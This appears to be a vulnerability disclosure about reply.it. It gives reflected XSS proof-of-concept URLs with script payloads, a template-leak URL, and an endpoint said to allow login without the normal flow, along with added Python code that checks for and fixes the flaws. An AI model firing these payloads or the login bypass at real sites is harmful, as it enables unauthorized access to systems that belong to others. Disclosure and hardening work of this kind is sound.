XSS
reply.it/it/search/?lang=IT&search=<script>alert(1);</script>
XSS
http://www.reply.it/en/tagSearch?tags=Financial+Reports%3Cscript%3Ealert%281%29;%3C/script%3E
Mirror (?) of the site, same issues:
http://d3v578iyw1eidm.cloudfront.net/
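As an added example (not part of the original post, and not reply.it's code): a small check that confirms a reflected XSS finding like the two above by decoding the query parameter the way the server sees it and verifying that the payload comes back with its tags intact, next to the escaped rendering that would close the bug. The two `render_*` functions are a hypothetical stand-in for the search page; the parameter names `search` and `tags` come from the URLs above.

```python
"""Reflected-XSS confirmation check (added example, hypothetical page renderer)."""
import html
import re
from urllib.parse import urlsplit, unquote_plus

# Payload used in the finding above.
PAYLOAD = "<script>alert(1);</script>"


def query_params(url: str) -> dict:
    """Decode the query string the way the server sees it.

    Splits on '&' only: older versions of urllib's parse_qs also split on ';',
    which would truncate a payload such as 'alert(1);' in the middle.
    """
    params = {}
    for pair in urlsplit(url).query.split("&"):
        if not pair:
            continue
        name, _, value = pair.partition("=")
        params[unquote_plus(name)] = unquote_plus(value)
    return params


def render_vulnerable(term: str) -> str:
    """Hypothetical vulnerable page: the term is concatenated into the HTML as-is."""
    return f'<div class="results">Results for "{term}"</div>'


def render_fixed(term: str) -> str:
    """Fixed rendering: HTML-escape before the term lands in element content."""
    return f'<div class="results">Results for "{html.escape(term, quote=True)}"</div>'


def reflected_unescaped(body: str, payload: str) -> bool:
    """True when the payload appears verbatim in the response (tags intact);
    False when it was encoded (&lt;script&gt;) or not reflected at all."""
    return payload in body


def tag_free(body: str) -> bool:
    """Sanity check on a rendered page: no raw <script tag survives."""
    return re.search(r"<script\b", body, re.IGNORECASE) is None


if __name__ == "__main__":
    url = "http://www.reply.it/en/tagSearch?tags=Financial+Reports%3Cscript%3Ealert%281%29;%3C/script%3E"
    term = query_params(url)["tags"]
    print("vulnerable reflects payload:", reflected_unescaped(render_vulnerable(term), PAYLOAD))
    print("fixed reflects payload:     ", reflected_unescaped(render_fixed(term), PAYLOAD))
```

Run it against a real response body instead of `render_vulnerable()` to confirm a finding: if `reflected_unescaped()` is true the parameter is injectable; if the body contains `&lt;script&gt;` instead, output encoding is already in place.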
Several problems in the JSP pages (unhandled null exceptions, exposed template data, etc.).
The template (?) is exposed by requesting a non-existent id (?):
http://reply.it/it/practices/cloudcomputing/readd,7700-
Sample of the output (from http://reply.it/it/practices/cloudcomputing/readd,7700- ):
---------------
<div class="yui-gc clear" id="unacolonna"> <div class="yui-u first" id="col_2_3_sx"> <div class="tab"> ^service_link^ ^tag_contenuto^ ^dettaglio_contenuto^ </div>
</div> <div class="yui-gb"> ^box_jolly_cx_2^ ^box_jolly_cx_3^ ^box_jolly_cx_4^
---------------
It's also possible to submit data via POST, and it gets parsed as part of the template.
(Useless on its own, but a possible XSS vector.)
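As an added example (not the site's code): a minimal reproduction of the two template problems described above, a renderer that emits raw `^name^` markers when the requested id does not exist and merges request data into the values the template is filled from, next to a hardened version that fails closed. The `^name^` placeholder syntax and the placeholder names are taken from the sample output; the renderer, the content store, the id `9999` and the request field names are assumptions made for the example.

```python
"""Template placeholder leak, naive vs. fail-closed renderer (added example)."""
import re

# Placeholder syntax seen in the leaked output: ^service_link^, ^tag_contenuto^, ...
PLACEHOLDER = re.compile(r"\^([A-Za-z0-9_]+)\^")

# Skeleton built from the sample output above (shortened).
TEMPLATE = (
    '<div class="tab"> ^service_link^ ^tag_contenuto^ ^dettaglio_contenuto^ </div>\n'
    '<div class="yui-gb"> ^box_jolly_cx_2^ ^box_jolly_cx_3^ </div>'
)

# Constructed content store: only id 7700 exists (values are server-side HTML).
CONTENT = {
    "7700": {
        "service_link": '<a href="/cloud">Cloud</a>',
        "tag_contenuto": "cloud computing",
        "dettaglio_contenuto": "<p>Cloud computing practice</p>",
        "box_jolly_cx_2": "<div>box 2</div>",
        "box_jolly_cx_3": "<div>box 3</div>",
    },
}


def leaked_placeholders(body: str) -> list:
    """Check to run on a response: names of ^...^ markers that reached the client."""
    return PLACEHOLDER.findall(body)


def render_naive(content_id: str, request_fields: dict) -> str:
    """The behaviour the post describes (hypothetical reconstruction):
    an unknown id yields an empty record, unresolved markers are emitted
    as-is, and request (POST) fields are merged into the template data."""
    data = dict(CONTENT.get(content_id, {}))
    data.update(request_fields)  # request data "parsed as within the template"
    return PLACEHOLDER.sub(lambda m: data.get(m.group(1), m.group(0)), TEMPLATE)


class TemplateError(Exception):
    """Raised instead of leaking a half-rendered page."""


def render_hardened(content_id: str, request_fields: dict) -> str:
    """Fail closed: unknown id is an error (a 404 in practice), only server-side
    content fills the template, and an unresolved marker is a bug, not output."""
    if content_id not in CONTENT:
        raise TemplateError(f"no content for id {content_id!r}")
    data = CONTENT[content_id]  # request_fields deliberately never reach the template
    out = PLACEHOLDER.sub(lambda m: data.get(m.group(1), m.group(0)), TEMPLATE)
    missing = leaked_placeholders(out)
    if missing:
        raise TemplateError(f"unresolved placeholders: {missing}")
    return out


def render_or_none(content_id: str, request_fields: dict):
    """Convenience wrapper: the hardened page, or None when rendering is refused."""
    try:
        return render_hardened(content_id, request_fields)
    except TemplateError:
        return None


if __name__ == "__main__":
    print(leaked_placeholders(render_naive("9999", {})))
    print(render_naive("9999", {"service_link": "<script>alert(1)</script>"}))
    print(render_or_none("9999", {}))
```

`leaked_placeholders()` is the part worth keeping: run it over any page from the site and a non-empty list means the skeleton is being served instead of content.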
---------------
Bug in the Getahead DWR library (AJAX for Java), probably an old version (?).
It's possible to log in without going through the normal login flow,
with a single request to this path:
http://www.reply.it/WPSReply2009/dwr/exec/RegistrationHandler.loginUser.dwr